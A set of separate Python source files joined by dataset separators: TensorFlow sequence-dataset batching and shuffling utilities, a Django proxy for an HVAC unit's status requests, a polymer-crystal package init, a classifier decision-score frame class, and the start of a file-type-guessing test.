    # Convert weights to probabilities.
    logits = tf.math.log(tf.constant(scaled, dtype=tf.float32))
    return tf.nn.softmax(logits).numpy().tolist()
def _get_output_shapes(dataset):
    """Returns the outputs shapes of the dataset.

    Args:
      dataset: A ``tf.data.Dataset``.

    Returns:
      A nested structure of ``tf.TensorShape``
    """

    def _spec_shape(spec):
        return spec.shape

    return tf.nest.map_structure(_spec_shape, dataset.element_spec)
def get_dataset_size(dataset, batch_size=5000):
    """Get the dataset size.

    Example:

      >>> dataset = tf.data.Dataset.range(5)
      >>> opennmt.data.get_dataset_size(dataset).numpy()
      5

    Args:
      dataset: A dataset.
      batch_size: The batch size to use to improve the scan performance, or
        ``None`` to scan the dataset as-is.

    Returns:
      The dataset size or ``None`` if the dataset is infinite.
    """
    if dataset.cardinality() == tf.data.INFINITE_CARDINALITY:
        # Infinite datasets have no size.
        return None
    if batch_size is not None:
        # Batching reduces the number of reduce steps required for the scan.
        dataset = dataset.batch(batch_size)
    def _reduce_func(count, element):
        # Count the leading (batch) dimension of the first flattened component.
        element = tf.nest.flatten(element)[0]
        batch_size = tf.shape(element)[0]
        return count + tf.cast(batch_size, count.dtype)
    return dataset.reduce(tf.constant(0, dtype=tf.int64), _reduce_func)
def filter_irregular_batches(multiple):
    """Transformation that filters out batches based on their size.

    Example:

      >>> dataset = tf.data.Dataset.range(10).batch(3)
      >>> dataset = dataset.apply(opennmt.data.filter_irregular_batches(3))
      >>> len(list(iter(dataset)))
      3

    Args:
      multiple: The divisor of the batch size.

    Returns:
      A ``tf.data.Dataset`` transformation.
    """
    if multiple == 1:
        # Every batch size is a multiple of 1: nothing to filter.
        return lambda dataset: dataset

    def _is_regular(*element):
        first = tf.nest.flatten(element)[0]
        batch_size = tf.shape(first)[0]
        return tf.equal(batch_size % multiple, 0)

    def _transform(dataset):
        return dataset.filter(_is_regular)

    return _transform
def filter_examples_by_length(
    maximum_features_length=None,
    maximum_labels_length=None,
    features_length_fn=None,
    labels_length_fn=None,
):
    """Transformation that filters out examples with zero length or length that is
    greater than the configured maximum.

    Example:

      >>> dataset = dataset.apply(opennmt.data.filter_examples_by_length(...))

    Args:
      maximum_features_length: The maximum length or list of maximum lengths of
        the features sequence(s). ``None`` to not constrain the length.
      maximum_labels_length: The maximum length or list of maximum lengths of
        the labels sequence(s). ``None`` to not constrain the length.
      features_length_fn: A function mapping features to a sequence length.
      labels_length_fn: A function mapping labels to a sequence length.

    Returns:
      A ``tf.data.Dataset`` transformation.
    """
    if features_length_fn is None and labels_length_fn is None:
        # No way to measure lengths: return the identity transformation.
        return lambda dataset: dataset
    def _length_constraints(lengths, maximum_lengths):
        # Work with lists of lengths which correspond to the general multi source case.
        if not isinstance(lengths, list):
            lengths = [lengths]
        if not isinstance(maximum_lengths, list):
            maximum_lengths = [maximum_lengths]
        # Unset maximum lengths are set to None (i.e. no constraint).
        maximum_lengths += [None] * (len(lengths) - len(maximum_lengths))
        constraints = []
        for length, maximum_length in zip(lengths, maximum_lengths):
            # Zero-length sequences are always filtered out.
            constraints.append(tf.greater(length, 0))
            if maximum_length is not None:
                constraints.append(tf.less_equal(length, maximum_length))
        return constraints
    def _predicate(features, labels):
        # Keep the example only if every constraint on every side holds.
        cond = []
        features_length = (
            features_length_fn(features) if features_length_fn is not None else None
        )
        labels_length = (
            labels_length_fn(labels) if labels_length_fn is not None else None
        )
        if features_length is not None:
            cond.extend(_length_constraints(features_length, maximum_features_length))
        if labels_length is not None:
            cond.extend(_length_constraints(labels_length, maximum_labels_length))
        return tf.reduce_all(cond)
    return lambda dataset: dataset.filter(_predicate)
def make_cardinality_multiple_of(divisor):
    """Transformation that pads the dataset cardinality up to a multiple of
    :obj:`divisor` by recycling elements from the start of the dataset.

    Example:
        >>> dataset = tf.data.Dataset.range(7)
        >>> dataset = dataset.apply(opennmt.data.make_cardinality_multiple_of(10))
        >>> len(list(iter(dataset)))
        10

    Args:
        divisor: The value that should divide the dataset size.

    Returns:
        A ``tf.data.Dataset`` transformation.

    Tip:
        This transformation is useful when training multiple replicas on a finite
        dataset: it ensures each replica receives a non empty batch in the last
        training iteration.
    """
    if divisor == 1:
        return lambda dataset: dataset

    def _keep_iterating(consumed_count, element):
        # element[0] flags whether this element comes from the original dataset.
        # Keep consuming while we are still in the original data, or until the
        # number of consumed elements becomes a multiple of the divisor.
        from_original = element[0]
        return tf.math.logical_or(
            from_original, tf.math.not_equal(consumed_count % divisor, 0)
        )

    def _unwrap(consumed_count, element):
        del consumed_count
        return element[1]

    def _transform(dataset):
        # Infinite datasets have no cardinality to pad.
        if dataset.cardinality() == tf.data.INFINITE_CARDINALITY:
            return dataset
        # Tag original elements with True and the recycled padding with False.
        padding = dataset.repeat().map(lambda *x: (tf.constant(False), x))
        flagged = dataset.map(lambda *x: (tf.constant(True), x))
        combined = flagged.concatenate(padding)
        # Enumerate so the predicate can count consumed elements, stop once the
        # count is a suitable multiple, then strip the bookkeeping again.
        combined = combined.enumerate()
        combined = combined.apply(tf.data.experimental.take_while(_keep_iterating))
        return combined.map(_unwrap)

    return _transform
def random_shard(shard_size, dataset_size):
    """Transformation that splits the dataset into fixed-size shards and yields
    the shards in a random order.

    Example:
        >>> dataset = tf.data.Dataset.range(6)
        >>> dataset = dataset.apply(opennmt.data.random_shard(2, 6))
        >>> list(dataset.as_numpy_iterator())
        [0, 1, 4, 5, 2, 3]

    Args:
        shard_size: The number of examples in each shard.
        dataset_size: The total number of examples in the dataset.

    Returns:
        A ``tf.data.Dataset`` transformation.
    """
    # Ceiling division: the last shard may be smaller than shard_size.
    shard_count = -(-dataset_size // shard_size)
    shard_offsets = np.linspace(
        0, dataset_size, num=shard_count, endpoint=False, dtype=np.int64
    )

    def _transform(dataset):
        # Shuffle the shard start offsets, then emit each shard in that order.
        offsets_dataset = tf.data.Dataset.from_tensor_slices(shard_offsets)
        offsets_dataset = offsets_dataset.shuffle(shard_count)
        return offsets_dataset.flat_map(
            lambda offset: dataset.skip(offset).take(shard_size)
        )

    return _transform
def shuffle_dataset(buffer_size, shuffle_shards=True, dataset_size=None):
    """Transformation that shuffles the dataset based on its size.

    Example:
        >>> dataset = tf.data.Dataset.range(6)
        >>> dataset = dataset.apply(opennmt.data.shuffle_dataset(3))
        >>> list(dataset.as_numpy_iterator())
        [2, 3, 1, 0, 4, 5]

    Args:
        buffer_size: The number of elements from which to sample; a negative
            value means shuffling over the full dataset.
        shuffle_shards: When :obj:`buffer_size` is smaller than the dataset
            size, first shard the dataset in a random order to add another
            level of shuffling.
        dataset_size: If the dataset size is already known, it can be passed
            here to avoid a slower generic computation of the dataset size
            later.

    Returns:
        A ``tf.data.Dataset`` transformation.
    """

    def _shuffle(dataset):
        sample_size = buffer_size
        # Both a full shuffle (negative buffer) and shard shuffling need the
        # total dataset size; compute it lazily only when required.
        if sample_size < 0 or shuffle_shards:
            total_size = (
                dataset_size if dataset_size is not None else get_dataset_size(dataset)
            )
            tf.get_logger().info("Training on %d examples", total_size)
            if sample_size < 0:
                sample_size = total_size
            elif sample_size < total_size:
                # Buffer smaller than the dataset: shard randomly first so
                # distant examples can still end up in the same buffer.
                dataset = dataset.apply(random_shard(sample_size, total_size))
        return dataset.shuffle(sample_size)

    return _shuffle
def batch_dataset(batch_size, padded_shapes=None):
    """Transformation that batches a dataset with padding.

    Example:
        >>> dataset = dataset.apply(opennmt.data.batch_dataset(...))

    Args:
        batch_size: The batch size.
        padded_shapes: The padded shapes for this dataset. If ``None``, the
            shapes are automatically inferred from the dataset output shapes.

    Returns:
        A ``tf.data.Dataset`` transformation.

    See Also:
        :func:`opennmt.data.batch_sequence_dataset`
    """

    def _transform(dataset):
        # ``or`` (not an ``is None`` check) on purpose: any falsy value falls
        # back to the shapes inferred from the dataset itself.
        shapes = padded_shapes or _get_output_shapes(dataset)
        return dataset.padded_batch(batch_size, padded_shapes=shapes)

    return _transform
def batch_sequence_dataset(
    batch_size,
    batch_type="examples",
    batch_multiplier=1,
    batch_size_multiple=1,
    length_bucket_width=None,
    length_fn=None,
    padded_shapes=None,
):
    """Transformation that batches a dataset of sequences.

    This implements an example-based and a token-based batching strategy
    with optional bucketing of sequences.
    Bucketing makes the batches contain sequences of similar lengths to optimize
    the training efficiency. For example, if :obj:`length_bucket_width` is 5,
    sequences will be organized by the following length buckets:
    1 - 5 | 6 - 10 | 11 - 15 | ...
    Then when building the next batch, sequences will be selected from the same
    length bucket.
    If the dataset has parallel elements (e.g. a parallel source and target
    dataset), the element is assigned to the bucket corresponding to the maximum
    length of all parallel elements.

    Example:
        >>> dataset = dataset.apply(opennmt.data.batch_sequence_dataset(...))

    Args:
        batch_size: The batch size.
        batch_type: The training batching strategy to use: can be "examples" or
            "tokens".
        batch_multiplier: The batch size multiplier.
        batch_size_multiple: When :obj:`batch_type` is "tokens", ensure that the
            resulting batch size is a multiple of this value.
        length_bucket_width: The width of the length buckets to select batch
            candidates from. ``None`` to not constrain batch formation.
        length_fn: A function or list of functions (in case of a parallel dataset)
            that take features as argument and return the associated sequence length.
        padded_shapes: The padded shapes for this dataset. If ``None``, the shapes
            are automatically inferred from the dataset output shapes.

    Returns:
        A ``tf.data.Dataset`` transformation.

    Raises:
        ValueError: if :obj:`batch_type` is not one of "examples" or "tokens".
        ValueError: if :obj:`batch_type` is "tokens" but :obj:`length_bucket_width`
            is not set.
        ValueError: if the number of length functions in :obj:`length_fn` does not
            match the number of parallel elements.

    See Also:
        :func:`opennmt.data.batch_dataset`
    """
    # The effective batch size accounts for the multiplier (e.g. gradient
    # accumulation or multi-replica scaling).
    batch_size = batch_size * batch_multiplier
    def _get_bucket_id(features, length_fn):
        # Bucket 0 is the fallback when no length information is available.
        default_id = tf.constant(0, dtype=tf.int32)
        if length_fn is None:
            return default_id
        lengths = length_fn(features)
        if lengths is None:
            return default_id
        if not isinstance(lengths, list):
            lengths = [lengths]  # Fallback to the general case of parallel inputs.
        # Integer division maps each length to its bucket index.
        lengths = [length // length_bucket_width for length in lengths]
        return tf.reduce_max(lengths)
    def _key_func(*args):
        # Normalize length_fn to one function per parallel dataset element.
        length_fns = length_fn
        if length_fns is None:
            length_fns = [None for _ in args]
        elif not isinstance(length_fns, (list, tuple)):
            length_fns = [length_fns]
        if len(length_fns) != len(args):
            raise ValueError(
                "%d length functions were passed but this dataset contains "
                "%d parallel elements" % (len(length_fns), len(args))
            )
        # Take the highest bucket id.
        bucket_id = tf.reduce_max(
            [
                _get_bucket_id(features, length_fn)
                for features, length_fn in zip(args, length_fns)
            ]
        )
        # group_by_window requires an int64 key.
        return tf.cast(bucket_id, tf.int64)
    def _reduce_func(unused_key, dataset):
        # Each window (one length bucket) is batched independently.
        return dataset.apply(batch_dataset(batch_size, padded_shapes=padded_shapes))
    def _window_size_func(key):
        # Token-based batching: the window (number of examples) shrinks as the
        # bucketed sequence length grows, keeping tokens-per-batch roughly
        # constant.
        if length_bucket_width > 1:
            key += 1  # For length_bucket_width == 1, key 0 is unassigned.
        size = batch_size // (key * length_bucket_width)
        required_multiple = batch_multiplier * batch_size_multiple
        if required_multiple > 1:
            # Round up to the next required multiple.
            size = size + required_multiple - size % required_multiple
        return tf.cast(tf.maximum(size, required_multiple), tf.int64)
    def _group_by_window(*args, **kwargs):
        # TODO: clean this API when TensorFlow requirement is updated to >=2.6.
        if compat.tf_supports("data.Dataset.group_by_window"):
            return lambda dataset: dataset.group_by_window(*args, **kwargs)
        else:
            return tf.data.experimental.group_by_window(*args, **kwargs)
    if length_bucket_width is None:
        if batch_type == "tokens":
            raise ValueError(
                "Batch type 'tokens' requires length bucketing (the parameter "
                "length_bucket_width should be non null)"
            )
        # No bucketing requested: plain example-based batching.
        return batch_dataset(batch_size, padded_shapes=padded_shapes)
    if batch_type == "examples":
        return _group_by_window(_key_func, _reduce_func, window_size=batch_size)
    elif batch_type == "tokens":
        return _group_by_window(
            _key_func, _reduce_func, window_size_func=_window_size_func
        )
    else:
        raise ValueError(
            "Invalid batch type: '{}'; should be 'examples' or 'tokens'".format(
                batch_type
            )
        )
def training_pipeline(
    batch_size,
    batch_type="examples",
    batch_multiplier=1,
    batch_size_multiple=1,
    process_fn=None,
    transform_fns=None,
    length_bucket_width=None,
    features_length_fn=None,
    labels_length_fn=None,
    maximum_features_length=None,
    maximum_labels_length=None,
    single_pass=False,
    num_shards=1,
    shard_index=0,
    num_threads=None,
    dataset_size=None,
    shuffle_buffer_size=None,
    prefetch_buffer_size=None,
    cardinality_multiple=1,
):
    """Transformation that applies most of the dataset operations commonly used
    for training on sequence data:

    * sharding
    * shuffling
    * processing
    * filtering
    * bucketization
    * batching
    * prefetching

    Example:
        >>> dataset = dataset.apply(opennmt.data.training_pipeline(...))

    Args:
        batch_size: The batch size to use.
        batch_type: The training batching strategy to use: can be "examples" or
            "tokens".
        batch_multiplier: The batch size multiplier.
        batch_size_multiple: When :obj:`batch_type` is "tokens", ensure that the
            resulting batch size is a multiple of this value.
        process_fn: The processing function to apply on each element.
        transform_fns: List of dataset transformation functions (applied after
            :obj:`process_fn` if defined).
        length_bucket_width: The width of the length buckets to select batch
            candidates from. ``None`` to not constrain batch formation.
        features_length_fn: A function mapping features to a sequence length.
        labels_length_fn: A function mapping labels to a sequence length.
        maximum_features_length: The maximum length or list of maximum lengths of
            the features sequence(s). ``None`` to not constrain the length.
        maximum_labels_length: The maximum length of the labels sequence.
            ``None`` to not constrain the length.
        single_pass: If ``True``, makes a single pass over the training data.
        num_shards: The number of data shards (usually the number of workers in a
            distributed setting).
        shard_index: The shard index this data pipeline should read from.
        num_threads: The number of elements processed in parallel.
        dataset_size: If the dataset size is already known, it can be passed here to
            avoid a slower generic computation of the dataset size later.
        shuffle_buffer_size: The number of elements from which to sample.
        prefetch_buffer_size: The number of batches to prefetch asynchronously. If
            ``None``, use an automatically tuned value.
        cardinality_multiple: Ensure that the dataset cardinality is a multiple of
            this value when :obj:`single_pass` is ``True``.

    Returns:
        A ``tf.data.Dataset`` transformation.

    See Also:
        - :func:`opennmt.data.batch_sequence_dataset`
        - :func:`opennmt.data.make_cardinality_multiple_of`
        - :func:`opennmt.data.filter_examples_by_length`
        - :func:`opennmt.data.filter_irregular_batches`
        - :func:`opennmt.data.shuffle_dataset`
    """
    if dataset_size is not None and num_shards > 1:
        # Update dataset_size based on the shard size.
        if isinstance(dataset_size, list):
            dataset_size = [size // num_shards for size in dataset_size]
        else:
            dataset_size //= num_shards
    def _make_weighted_dataset(datasets, weights):
        # Weighted datasets are repeated and sampled from, so a single pass is
        # not well-defined.
        if single_pass:
            raise ValueError(
                "single_pass parameter is not compatible with weighted datasets"
            )
        if not datasets:
            raise ValueError("At least one dataset is required")
        if weights is not None and len(weights) != len(datasets):
            raise ValueError(
                "%d dataset weights were provided, but %d were expected to match the "
                "number of data files" % (len(weights), len(datasets))
            )
        if num_shards > 1:
            datasets = [dataset.shard(num_shards, shard_index) for dataset in datasets]
        weights = normalize_weights(datasets, weights=weights, sizes=dataset_size)
        # Repeat before sampling so no dataset is exhausted during sampling.
        datasets = [dataset.repeat() for dataset in datasets]
        dataset = tf.data.experimental.sample_from_datasets(datasets, weights=weights)
        if shuffle_buffer_size is not None and shuffle_buffer_size != 0:
            # A full-dataset shuffle (negative buffer) cannot work on the
            # infinite sampled dataset.
            if shuffle_buffer_size < 0:
                raise ValueError(
                    "shuffle_buffer_size < 0 is not compatible with weighted datasets"
                )
            dataset = dataset.shuffle(shuffle_buffer_size)
        return dataset
    def _make_single_dataset(dataset):
        if num_shards > 1:
            dataset = dataset.shard(num_shards, shard_index)
        if shuffle_buffer_size is not None and shuffle_buffer_size != 0:
            dataset = dataset.apply(
                shuffle_dataset(shuffle_buffer_size, dataset_size=dataset_size)
            )
        return dataset
    def _pipeline(dataset):
        # The input may be (datasets, weights) for the weighted case.
        if isinstance(dataset, tuple):
            dataset, weights = dataset
        else:
            weights = None
        is_weighted_dataset = isinstance(dataset, list)
        if is_weighted_dataset:
            dataset = _make_weighted_dataset(dataset, weights)
        else:
            dataset = _make_single_dataset(dataset)
        if process_fn is not None:
            dataset = dataset.map(process_fn, num_parallel_calls=num_threads or 4)
        if transform_fns is not None:
            for transform_fn in transform_fns:
                dataset = dataset.apply(transform_fn)
        # Drop empty or overly long examples before batch formation.
        dataset = dataset.apply(
            filter_examples_by_length(
                maximum_features_length=maximum_features_length,
                maximum_labels_length=maximum_labels_length,
                features_length_fn=features_length_fn,
                labels_length_fn=labels_length_fn,
            )
        )
        dataset = dataset.apply(
            batch_sequence_dataset(
                batch_size,
                batch_type=batch_type,
                batch_multiplier=batch_multiplier,
                batch_size_multiple=batch_size_multiple,
                length_bucket_width=length_bucket_width,
                length_fn=[features_length_fn, labels_length_fn],
            )
        )
        dataset = dataset.apply(filter_irregular_batches(batch_multiplier))
        if not single_pass:
            if not is_weighted_dataset:  # Weighted dataset is repeated before sampling.
                dataset = dataset.repeat()
        else:
            # Pad the finite dataset so every replica gets a batch in the last
            # iteration.
            dataset = dataset.apply(make_cardinality_multiple_of(cardinality_multiple))
        dataset = dataset.prefetch(prefetch_buffer_size)
        return dataset
    return _pipeline
def inference_pipeline(
    batch_size,
    batch_type="examples",
    process_fn=None,
    transform_fns=None,
    length_bucket_width=None,
    length_fn=None,
    num_threads=None,
    prefetch_buffer_size=None,
):
    """Transformation that applies dataset operations for inference.

    Example:
        >>> dataset = dataset.apply(opennmt.data.inference_pipeline(...))

    Args:
        batch_size: The batch size to use.
        batch_type: The batching strategy to use: can be "examples" or "tokens".
        process_fn: The processing function to apply on each element.
        transform_fns: List of dataset transformation functions (applied after
            :obj:`process_fn` if defined).
        length_bucket_width: The width of the length buckets to select batch
            candidates from. If set, this means the inference pipeline will be
            reordered based on the examples length, the application is then
            responsible to restore the predictions in order. An "index" key will be
            inserted in the examples dictionary.
        length_fn: A function mapping features to a sequence length.
        num_threads: The number of elements processed in parallel.
        prefetch_buffer_size: The number of batches to prefetch asynchronously. If
            ``None``, use an automatically tuned value.

    Returns:
        A ``tf.data.Dataset`` transformation.

    Raises:
        ValueError: if :obj:`length_bucket_width` is set but not :obj:`length_fn`.
        ValueError: if :obj:`length_bucket_width` is set but the dataset does not
            output a dictionary structure.
    """
    def _inject_index(index, x):
        # Record the original position so the caller can restore the output
        # order after length-based reordering. The index is written into the
        # (first) features dict in place.
        if isinstance(x, tuple):
            features = x[0]
        else:
            features = x
        features["index"] = index
        return x
    def _pipeline(dataset):
        if process_fn is not None:
            dataset = dataset.map(process_fn, num_parallel_calls=num_threads)
        if transform_fns is not None:
            for transform_fn in transform_fns:
                dataset = dataset.apply(transform_fn)
        if length_bucket_width is not None and length_bucket_width > 0:
            if length_fn is None:
                raise ValueError("length_fn is required when reordering by length")
            # Validate that the structure supports index injection: elements
            # (or the first parallel element) must be Python dicts.
            output_shapes = _get_output_shapes(dataset)
            if isinstance(output_shapes, tuple):
                num_length_fn = (
                    len(length_fn) if isinstance(length_fn, (list, tuple)) else 1
                )
                if len(output_shapes) != num_length_fn:
                    raise ValueError(
                        "The dataset outputs %d parallel features, but got %d "
                        "length functions" % (len(output_shapes), num_length_fn)
                    )
                output_shapes = output_shapes[0]
            if not isinstance(output_shapes, dict):
                raise ValueError(
                    "Reordering by length expects dataset elements to be Python dicts"
                )
            dataset = dataset.enumerate()
            dataset = dataset.map(_inject_index)
            dataset = dataset.apply(
                batch_sequence_dataset(
                    batch_size,
                    batch_type=batch_type,
                    length_bucket_width=length_bucket_width,
                    length_fn=length_fn,
                )
            )
        else:
            # No reordering requested: plain padded batching.
            dataset = dataset.apply(batch_dataset(batch_size))
        dataset = dataset.prefetch(prefetch_buffer_size)
        return dataset
    return _pipeline
| StarcoderdataPython |
1619296 | <reponame>jokajak/infinity_tracker
# import datetime
import logging
# from django.conf import settings
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt
from requests import Request, Session
# from defusedxml import ElementTree as ET
# Get an instance of a logger
logger = logging.getLogger(__name__)
def proxy_request(request):
    """Forward the incoming Django *request* verbatim to its original URL.

    Replays the method, headers and body with the ``requests`` library and
    returns the raw upstream ``requests.Response``; callers are responsible
    for wrapping it in a Django ``HttpResponse``.
    """
    headers = dict(request.headers)
    full_uri = request.build_absolute_uri()
    method = request.method
    # Content-Length may be absent or empty; normalize to an int (0 if unset).
    content_length = int(request.headers.get("Content-Length", 0) or 0)
    # Disabled request-capture debugging code, kept for reference:
    # now = datetime.datetime.now().strftime("%Y%m%d_%H%M")
    # if settings.get("SAVE_REQUESTS", False) and content_length > 0 and request.method == "POST":
    # fname = "req_{uri}_{now}.xml".format(
    # uri=request.resolver_match.func.__name__, now=now
    # )
    # req_file = "{media}/{fname}".format(media=settings.MEDIA_ROOT, fname=fname)
    # with open(req_file, "w") as f:
    # f.write(request.POST["data"])
    logger.debug("{method}: {uri}".format(method=method, uri=full_uri))
    # Re-assert the body length so the upstream server sees the right size.
    headers["Content-Length"] = str(content_length)
    s = Session()
    # Build and prepare the request manually so arbitrary methods and headers
    # are forwarded unchanged.
    req = Request(method, full_uri, headers=headers, data=request.body)
    prepped = req.prepare()
    r = s.send(prepped)
    logger.debug("Response: {response}".format(response=r.content))
    # Disabled response-capture debugging code, kept for reference:
    # if settings.get("SAVE_RESPONSES", False) and r.content:
    # fname = "resp_{uri}_{now}.xml".format(
    # uri=request.resolver_match.func.__name__, now=now
    # )
    # req_file = "{media}/{fname}".format(media=settings.MEDIA_ROOT, fname=fname)
    # with open(req_file, "wb") as f:
    # f.write(r.content)
    return r
# Create your views here.
@csrf_exempt
def release_notes(request, uri=None):
    """Handle release note requests.

    Release note requests come in with a different URI as the path, so the
    upstream URL is rebuilt from the captured path instead of using
    ``request.build_absolute_uri()``.

    Bug fix: the upstream ``requests.Response`` was previously returned
    directly, but Django views must return an ``HttpResponse``; the response
    is now wrapped like in every other view of this module.
    """
    logger.info("Received release_notes request")
    headers = dict(request.headers)
    # Rebuild the absolute URL by re-prepending the scheme prefix.
    # NOTE(review): this assumes the URL pattern captures "://host/path" into
    # ``uri`` — confirm against the urlconf.
    full_uri = "http{uri}".format(uri=uri)
    method = request.method
    # Content-Length may be absent or empty; normalize to an int (0 if unset).
    content_length = int(request.headers.get("Content-Length", 0) or 0)
    logger.debug("{method}: {uri}".format(method=method, uri=full_uri))
    headers["Content-Length"] = str(content_length)
    s = Session()
    req = Request(method, full_uri, headers=headers, data=request.body)
    prepped = req.prepare()
    r = s.send(prepped)
    logger.debug("Response: {response}".format(response=r.content))
    return HttpResponse(
        content=r.content,
        status=r.status_code,
        content_type=r.headers.get("Content-Type"),
    )
@csrf_exempt
def default_handler(request, path=None):
    """Proxy any request that no more specific view matched.

    Logs the unmanaged path, forwards the request upstream, and returns the
    upstream body, status and content type as an ``HttpResponse``.
    """
    logger.info("Unmanaged path: {path}".format(path=path))
    upstream = proxy_request(request)
    return HttpResponse(
        content=upstream.content,
        status=upstream.status_code,
        content_type=upstream.headers.get("Content-Type"),
    )
def _proxied_response(request):
    """Proxy *request* upstream and convert the ``requests`` response into a
    Django ``HttpResponse`` (preserving body, status code and content type).

    Shared helper: the nine views below previously duplicated this body
    verbatim, so the wrapping logic now lives in one place.
    """
    r = proxy_request(request)
    return HttpResponse(
        content=r.content,
        status=r.status_code,
        content_type=r.headers.get("Content-Type"),
    )


@csrf_exempt
def alive(request):
    """Handle alive checks.

    This view handles proxying alive checks performed by the HVAC unit.
    """
    return _proxied_response(request)


@csrf_exempt
def systems_overview(request, serial):
    """Handle system posts.

    This view handles processing system status updates by the HVAC unit.
    """
    return _proxied_response(request)


@csrf_exempt
def systems_profile(request, serial):
    """Handle system profile posts.

    This view handles processing system status updates by the HVAC unit.
    """
    return _proxied_response(request)


@csrf_exempt
def systems_status(request, serial):
    """Handle system status posts.

    This view handles processing system status updates by the HVAC unit.
    """
    return _proxied_response(request)


@csrf_exempt
def systems_dealer(request, serial):
    """Handle system dealer posts.

    This view handles processing system status updates by the HVAC unit.
    """
    return _proxied_response(request)


@csrf_exempt
def systems_notifications(request, serial):
    """Handle system notifications posts.

    This view handles processing system status updates by the HVAC unit.
    """
    return _proxied_response(request)


@csrf_exempt
def systems_idu_config(request, serial):
    """Handle system In-Door Unit posts.

    This view handles processing system status updates by the HVAC unit.
    """
    return _proxied_response(request)


@csrf_exempt
def systems_odu_config(request, serial):
    """Handle system Out-Door Unit posts.

    This view handles processing system status updates by the HVAC unit.
    """
    return _proxied_response(request)


@csrf_exempt
def systems_equipment_events(request, serial):
    """Handle system equipment events posts.

    This view handles processing system status updates by the HVAC unit.
    """
    return _proxied_response(request)
| StarcoderdataPython |
1609371 | """
polymerXtal
In this work, we present PolymerXtal, a software designed to build and analyze molecular-level polymer crystal structures. PolymerXtal provides a standardized process to generate polymer crystal structure based on monomer, tacticity, helicity, chiriality and unit cell information and analyze the crystallinity in polymer systems with given atom trajectories. These features have allowed PolymerXtal to lead further investigations of semi-crystalline polymers where the birthplace of the important physics in play and promote future research endeavors in the area of crystalline polymer simulations.
"""
import os
# Create scratch directories for intermediate bond/type data.
# os.makedirs with exist_ok=True creates missing parents (".tmp") in one call
# and avoids the check-then-create race of the previous exists()/mkdir()
# pattern.
os.makedirs(".tmp/bonds", exist_ok=True)
os.makedirs(".tmp/types", exist_ok=True)
# Add imports here
from .data import sample_chain
from .crystal import Helice, Chain, Cell
# Handle versioneer: expose the generated version information as module
# attributes, then delete the temporaries so they do not leak into the
# package namespace.
from ._version import get_versions
versions = get_versions()
__version__ = versions["version"]
__git_revision__ = versions["full-revisionid"]
del get_versions, versions
| StarcoderdataPython |
133421 | from __future__ import annotations
from typing import Sequence
from pathlib import Path
import numpy as np
import pandas as pd
from dscience.core.exceptions import *
from dscience.core.extended_df import *
from dscience.ml.confusion_matrix import *
from kale.ml.accuracy_frames import *
class DecisionFrame(OrganizingFrame):
    """
    An n × m matrix of probabilities (or scores) from a classifier.
    The n rows are samples, and the m columns are predictions. The values are the confidence or pobability of prediction.
    The single index column is named 'correct_label', and the single column name is named 'label'.
    Practically, this is a Pandas wrapper around a scikit-learn decision_function
    that also has the predicted and correct class labels.
    """
    @classmethod
    def required_index_names(cls) -> Sequence[str]:
        # The two-level index: the correct class label and the sample identifier.
        return ["label", "sample_id"]
    @classmethod
    def of(
        cls,
        correct_labels: Sequence[str],
        labels: Sequence[str],
        decision_function: np.ndarray,
        sample_ids: Sequence[Any],
    ) -> DecisionFrame:
        """
        Wraps a decision function numpy array into a DecisionFrame instance complete with labels as names and columns.
        :param correct_labels: A length-n list of the correct labels for each of the n samples
        :param labels: A length-m list of class labels matching the predictions (columns) on `probabilities`
        :param decision_function: An n × m matrix of probabilities (or scores) from the classifier.
            The rows are samples, and the columns are predictions.
            scikit-learn decision_functions (ex model.predict_proba) will output this.
        :param sample_ids: IDs (or names) of training examples for later reference; should be unique
        :return: A DecisionFrame
        """
        decision_function = pd.DataFrame(decision_function)
        # Two-level index (label, sample_id); columns are the predicted classes.
        decision_function.index = [correct_labels, sample_ids]
        decision_function.columns = labels
        decision_function.index.names = ["label", "sample_id"]
        return cls.convert(decision_function)
    def confusion(self) -> ConfusionMatrix:
        """Aggregate per-sample scores into a column-normalized confusion matrix."""
        labels = self.columns
        correct_labels = self.index.get_level_values("label")
        # Sanity checks: the matrix shape must match the label sequences.
        if self.shape[0] != len(correct_labels):
            raise LengthMismatchError(
                "Number of rows of decision function of shape {} is not the length of the correct labels {}".format(
                    self.shape, len(correct_labels)
                )
            )
        if self.shape[1] != len(labels):
            raise LengthMismatchError(
                "Number of columns of decision function of shape {} is not the length of the class labels {}".format(
                    self.shape, len(labels)
                )
            )
        # correct_confused_with[correct][predicted] accumulates score mass.
        correct_confused_with = {c: {p: 0.0 for p in labels} for c in labels}
        for r, row in enumerate(self.index):
            correct_name = correct_labels[r]
            for c, column in enumerate(self.columns):
                confused_name = labels[c]
                correct_confused_with[correct_name][confused_name] += self.iat[r, c]
        # NOTE(review): with a dict-of-dicts, the resulting DataFrame has the
        # *correct* labels as columns and predicted labels as rows; each column
        # is then normalized to sum to 1. Confirm this orientation matches what
        # ConfusionMatrix expects.
        correct_confused_with = pd.DataFrame(correct_confused_with)
        correct_confused_with /= correct_confused_with.sum()
        return ConfusionMatrix(correct_confused_with)
    def accuracy(self) -> AccuracyFrame:
        """Build a per-sample frame of predicted label and scores (as percentages)."""
        actual_labels = self.index.get_level_values("label").values
        sample_ids = self.index.get_level_values("sample_id").values
        # Flatten to a single 'label' index so row-wise lookups by the correct
        # label (r.loc[r.name]) are possible.
        stripped = self.reset_index().drop("sample_id", axis=1).set_index("label")
        # Highest-scoring class per sample, and its score.
        predicted_labels = stripped.idxmax(axis=1).values
        predicted_probs = stripped.max(axis=1).values
        # Score assigned to the *correct* class of each sample.
        actual_probs = stripped.apply(lambda r: r.loc[r.name], axis=1).values
        return AccuracyFrame(
            {
                "label": actual_labels,
                "sample_id": sample_ids,
                "prediction": predicted_labels,
                "score": actual_probs * 100.0,
                "score_for_prediction": predicted_probs * 100.0,
            }
        )
    @classmethod
    def read_csv(cls, path: PathLike, *args, **kwargs) -> DecisionFrame:
        """Read a CSV previously written by :meth:`to_csv` and restore the index."""
        df = pd.read_csv(Path(path)).set_index(cls.required_index_names())
        return cls(df)
    def to_csv(self, path: PathLike, *args, **kwargs):
        """Write to CSV with the (label, sample_id) index as ordinary columns."""
        self.to_vanilla().to_csv(path, index_label=self.__class__.required_index_names())
__all__ = ["DecisionFrame"]
| StarcoderdataPython |
3317276 | <filename>tests/ftguess/test_basic.py
"""Test ftguess"""
import unittest
import os
from os.path import splitext
from oletools import ftguess
# Directory with test data, independent of current working directory
from tests.test_utils import DATA_BASE_DIR
from tests.test_utils.testdata_reader import loop_over_files
class TestFTGuess(unittest.TestCase):
